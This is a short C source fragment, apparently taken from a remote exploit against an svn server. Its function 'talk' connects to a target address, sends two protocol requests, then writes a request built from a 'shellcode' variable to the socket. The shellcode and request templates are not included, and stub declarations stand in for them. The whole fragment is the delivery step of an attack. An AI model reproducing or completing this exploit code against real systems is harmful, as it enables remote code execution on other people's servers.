
typedef unsigned long size_t;
typedef long intptr_t; typedef unsigned long uintptr_t;
typedef long scalar_t__;

typedef int bool;
 char* build_request (int ) ;
 int close (int ) ;
 int exit (int) ;
 int printf (char*) ;
 int recv (int ,char*,int,int ) ;
 char* request1 ;
 char* request2 ;
 scalar_t__ send (int ,char*,int,int ) ;
 int shellcode ;
 int sockfd ;
 int sprintf (char*,char*,...) ;
 int strlen (char*) ;
 scalar_t__ write (int ,char*,int) ;
 int xp_connect (char*) ;

void talk(char *ip, char *repo)
{
char buffer[1024], request[1024], tmp[512];
static char string[] = "svn://%s/%s";
int size;
char *str;

sprintf(buffer, string, ip, repo);
size = strlen(buffer);
sprintf(request, request1, size, buffer);

xp_connect(ip);

if (send(sockfd, request, strlen(request), 0) < 0)
{
printf("send() failed\n");
exit(-1);
}
recv(sockfd, tmp, 512, 0);

if (send(sockfd, request2, strlen(request2), 0) < 0)
{
printf("send() failed\n");
exit(-1);
}
recv(sockfd, tmp, 512, 0);

str = build_request(shellcode);

if(write (sockfd, str, strlen(str)) < 0)
{
printf("write() failed\n");
exit(-1);
}

close(sockfd);

}
